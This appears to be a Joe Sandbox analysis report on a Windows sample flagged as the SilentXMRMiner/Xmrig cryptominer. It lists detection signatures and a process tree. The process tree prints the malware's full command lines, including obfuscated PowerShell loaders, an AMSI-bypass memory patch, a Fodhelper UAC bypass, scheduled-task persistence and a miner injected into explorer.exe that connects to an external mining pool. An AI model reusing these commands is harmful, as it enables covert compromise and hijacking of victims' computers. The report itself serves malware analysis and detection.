Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e7WMhx18XN.exe

Overview

General Information

Sample name:e7WMhx18XN.exe
renamed because original name is a hash value
Original sample name:38be83afea1e906c05e5b851253cbc6a.exe
Analysis ID:1528504
MD5:38be83afea1e906c05e5b851253cbc6a
SHA1:85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256:425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
Tags:32CoinMinerexe
Infos:

Detection

SilentXMRMiner, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
UAC bypass detected (Fodhelper)
Yara detected SilentXMRMiner
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected Stratum mining protocol
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 7712 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • e7WMhx18XN.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\e7WMhx18XN.exe" MD5: 38BE83AFEA1E906C05E5B851253CBC6A)
    • cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1016 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • findstr.exe (PID: 6140 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 3888 cmdline: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1784 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2988 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • powershell.exe (PID: 3228 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WMIC.exe (PID: 4672 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
              • findstr.exe (PID: 5980 cmdline: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
              • cmd.exe (PID: 6112 cmdline: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 6052 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
                • schtasks.exe (PID: 7820 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                  • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 6668 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 3800 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 736 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 2796 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5320 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • powershell.exe (PID: 5584 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7780 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • paint.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Local\Temp\paint.exe" MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
      • conhost.exe (PID: 7704 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2968 cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7796 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 1704 cmdline: "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • services64.exe (PID: 6152 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
            • conhost.exe (PID: 6140 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WerFault.exe (PID: 7804 cmdline: C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • FodhelperBypassUAC.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" MD5: 9EB62648C9CC2F1EDD3E9CEF736F9C5C)
      • cmd.exe (PID: 6080 cmdline: /c C:\Windows\System32\fodhelper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fodhelper.exe (PID: 6184 cmdline: C:\Windows\System32\fodhelper.exe MD5: 85018BE1FD913656BC9FF541F017EACD)
          • cmd.exe (PID: 5900 cmdline: "cmd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Sgrmuserer.exe (PID: 7764 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 2632 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7960 cmdline: C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • services64.exe (PID: 7424 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 9CA610EB2F785C8D2DDF2A50347039ED)
    • conhost.exe (PID: 7536 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost64.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: 61D09675A406E39F17F2EA03A3CB8CCC)
        • conhost.exe (PID: 3332 cmdline: "C:\Windows\System32\conhost.exe" "/sihost64" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 1528 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth MD5: 662F4F92FDE3557E86D110526BB578D5)
  • powershell.exe (PID: 3488 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNksxDtTNKAc.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ldjQKaGUcclhcmhFUiK=fuLUlHVbHHgj @([String])([IntPtr]);$OGRkrpCaviqYlLkTxWpljP=fuLUlHVbHHgj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JbgpKYFPFWJ=$iKNksxDtTNKAc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+'l'+'')));$PQfPIIgelMLvUB=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$GDgGvFoXzgYhofixb=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$DcSwIDH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$DcSwIDH,[Object](''+'A'+'m'+[Char](115)+'i'+'S'+'c'+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$QQMIPunPos=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,4,[ref]$QQMIPunPos);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rcGSxwaaaaKUimwsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,0x20,[ref]$QQMIPunPos);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 7560 cmdline: C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
